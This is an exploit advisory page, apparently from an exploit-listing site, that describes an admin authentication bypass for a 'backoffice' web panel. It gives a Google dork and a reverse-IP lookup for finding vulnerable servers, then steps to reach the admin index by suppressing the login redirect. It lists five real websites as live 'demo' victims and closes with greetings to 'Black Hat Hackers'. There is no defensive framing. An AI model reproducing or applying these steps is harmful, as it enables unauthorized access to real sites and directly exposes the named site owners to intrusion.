OBE - Bypass admin with Noredirect

2020.07.23
sa H9xHacker (SA) sa
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:OBE - Bypass admin with Noredirect # Date: 23/07/2020 # Dork:inurl:/backoffice/login.php # Exploit Author:H9xHacker # Tested on:Linux Reverse check bing.com ip:72.55.140.20 backoffice/login.php OR ip:72.55.140.20 .php?id= (There are 95 domains hosted on this server). open http://site.com/backoffice/login.php use NoRedirect tool & add http://site.com/backoffice/login.php then open http://site.com/backoffice/index.php #Demo: https://ilustracaosjm.pt/backoffice/login.php https://www.abedigitalsolutions.com/backoffice/login.php http://www.serial.pt/backoffice/login.php https://www.plakamat.pt/backoffice/login.php http://www.unicor.pt/backoffice/login.php ------------------------ Greets:Black Hat Hackers


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top